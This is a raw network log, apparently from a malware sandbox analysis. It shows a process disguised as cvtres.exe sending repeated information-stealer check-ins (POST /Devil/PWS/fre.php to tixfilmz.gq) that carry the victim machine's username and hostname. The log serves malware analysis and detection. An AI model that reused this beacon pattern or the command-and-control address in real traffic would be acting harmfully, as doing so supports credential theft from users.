Aug 11, 2022 06:43:13.338433981 CEST	1385	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:13.432349920 CEST	1387	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pSXrIJpk6ZpMncGD3TgB%2FqwIhl6a%2B3mRqUAwGpIWSVQH0Ee29o2ZI7BeNf8YAXl9H8yVFpgu9dtwKBr3ncuE9Vsb8gki4xjrFyLXRsgELg%2FkuxWGC9uZ7LhmsOjoJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4f204d97bb5b-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.3	49828	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:14.503252029 CEST	1397	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:14.520320892 CEST	1397	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:14.600589037 CEST	1398	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dv4%2BoOi5evPSAVQLTc2mUQ4pvvIG8rNRmP9Ln2E2L8om1gg9xOGAlvAjgzmpl572ZeTbGuweNIw7wAfKIF0DNqbFFiN7gv5L4L%2BLkuzsE4%2FCZv49vkcG%2B5zRo7T49w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4f27ad55bbd1-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.3	49830	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:16.837785959 CEST	1440	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:16.854964972 CEST	1440	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:16.930457115 CEST	1441	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iFtawzBVjKjfrYrTAXjWWVtSP35trHD4uy6FS8qwT%2FfFHVrEe%2FTc9dBinz2ob3cQ0O7AzKwO63aMtQ1kYprOm2DWU6NovWEIH3GeGDQutnrzD%2FF3T39YT03HJTuHQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4f364cc69174-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.3	49832	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:19.747801065 CEST	1484	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:19.767625093 CEST	1484	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:19.855670929 CEST	1485	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CaS9%2BYgRMKIuYHiYF9PMKotC1%2F7zwSjVypA7MoG8Z03%2FoftZ4IWHbs5M34XcrwMKqLX%2BT6SkCHkTcTD6uxax9JvlNPzGZ1SC7j5Nhhd8ZllZZu9yf4%2Bo7wJ%2F8PtS%2BA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4f487dc29189-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49747	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:18.537200928 CEST	1035	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:18.554195881 CEST	1036	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:18.641688108 CEST	1036	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IusO3PS%2BNxKdc1pE1bhnckIxsL5IUfCMg2N0ixhg1CJ8YDJ1sexeannt%2BdOuWAWENyuH9TYSsv6kia7W5E0PwtJhXkXW0Vn8XxMvKbR1Rut7thDprsdBL3x8jct0aw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4dc9eb03bb55-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.3	49838	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:24.421880960 CEST	1608	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:24.438859940 CEST	1608	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:24.509193897 CEST	1609	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PzEsNnNOyz3YF3aEBRXvh3K9KQvGcEvnSSCN4vPpTjroe2CdoRvCY3yd5MzLyo0CO%2FPZH15tb2Qp%2FH2lo0amjWieNCoQKt8S5G7oS%2BYRWMj1ca3dBeg96NEOgjMu1g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4f65af9d901f-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.3	49840	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:28.505356073 CEST	1688	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:28.522589922 CEST	1689	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:28.641503096 CEST	1689	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ASF5E3GRXofzWndMoPxJXG8e5UkQSbK%2FlNaMMjDLkTvQbD7nUo3PKgLQLe2AMHiYEUmp8dWmfsoSZL7l%2FP0svRTe1xWq78GppXcYKYNfSWHbL2xjYF8le7h%2BNUvJOQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4f7f2c91bbc5-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.3	49843	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:31.924021959 CEST	1875	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:31.941167116 CEST	1876	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:32.031413078 CEST	1876	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YCz4l%2FWMs4%2Ft6T4roGOVmWA1AuqgTgH5jFgyCPcBhZVhhwjFBPrOMeCgA6mijAaE6gGUqOi%2FTliryZUYwdkekasVLPgmGDk%2Fv4wJoZU%2BDunFOkhmcLEolgILAEWyIQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4f948e719bf2-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.3	49850	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:33.879384995 CEST	1940	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:33.896676064 CEST	1941	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:33.985601902 CEST	1941	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZxzAqAPs2%2B6wkiZaXBxWxAQ4viYz%2BoQPXsrKgYYoP1o%2FilJWV3JSd4ydT7ciR4Q7LMU%2BteRlLQDJ%2FPfqQgzfvbTkPVa2pbNAYKorn7mnu1JpWy7zcn2XQ%2F2eG5suGw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4fa0c8d09bda-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.3	49852	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:38.361572981 CEST	8099	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:38.378686905 CEST	8100	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:38.459871054 CEST	8100	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FhTvEJmUxdlBdtgZfnodLReacuCGVKe2uoOMZPYIPhRqxUJZk7yozeMUpPRCr%2Bno%2BMXmxvqCj1pmNMTB0ZrxKAYncxbZXxFGbxoScHN6nlzyyk7J3BJfEeZnmtjjew%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4fbcdd64bbaf-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.3	49853	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:40.660156012 CEST	8101	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:40.677138090 CEST	8102	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:40.763823032 CEST	8102	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gNwebsyEgMDFNhgjG0aRbZLoCte8tvTShOPR1oOzqrpkSBVA%2B8GMne7vTM2AEkRTl8uZA1OYnbLyaLFEiKWFoYzXm0YX9AfMVJ1bZU%2BPZtt1Kjdimycri3H0IvcvVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4fcb2c189bca-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.3	49859	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:42.759258032 CEST	8114	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:42.776278019 CEST	8114	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:42.876914978 CEST	8116	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4RvVy60nLA3v4HrKzZYfrW4%2F3xt%2FiU2kLkJlk74mT%2BhWITlwXhRN8mLONVm9B9%2BpoJPvWSXpKZbbzfthOx3UBUhltFhK9uBRynyAbFJZCed0Vmv0M8SFZqLtCsynNQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4fd8497d9189-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.3	49867	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:45.824251890 CEST	9805	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:45.841337919 CEST	9806	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:45.919315100 CEST	9808	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pbflkE4kDEMCE6ymUD403N1kU66oVIP%2F3IVv0%2F5V%2Flzq97z7yxanXvWuJ0G3qXFpIpWgBJ45067X6olyX3AGKL3fenmvhXUS47uSbrWlJx2YiIWIKyESFSExnqX1xA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4feb6a909ba7-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.3	49875	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:47.334573030 CEST	9822	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:47.351474047 CEST	9822	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:47.447091103 CEST	9823	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VaUye4N1FNqUlwpBToxQO7gC5LHWHfn%2Fr2K2nOqmQYNTaFvaW7EMwrHDZUuO0kFWYbzEazhFdrNGB0hYcDJvRXYn6FK%2Fr4JSI3k2qfDn3u%2BSwtdXQrZk4fiIQWHIBQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4ff4dc5cbbc2-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.3	49879	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:48.403290033 CEST	9833	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:48.420222044 CEST	9833	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:48.498898983 CEST	9834	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lQFtwGGU3Dkg98O%2BQCp%2FzXuHQRQFBA4HyDpgZtFCPViawmosXQH71RqlUE19EbzNIVbeLBILNkUCH%2BKqp1baijUopAMHfIOgdYQNUi3TzDIaGl7BAcxGWoTEbPx5Gw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4ffb8eff924f-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
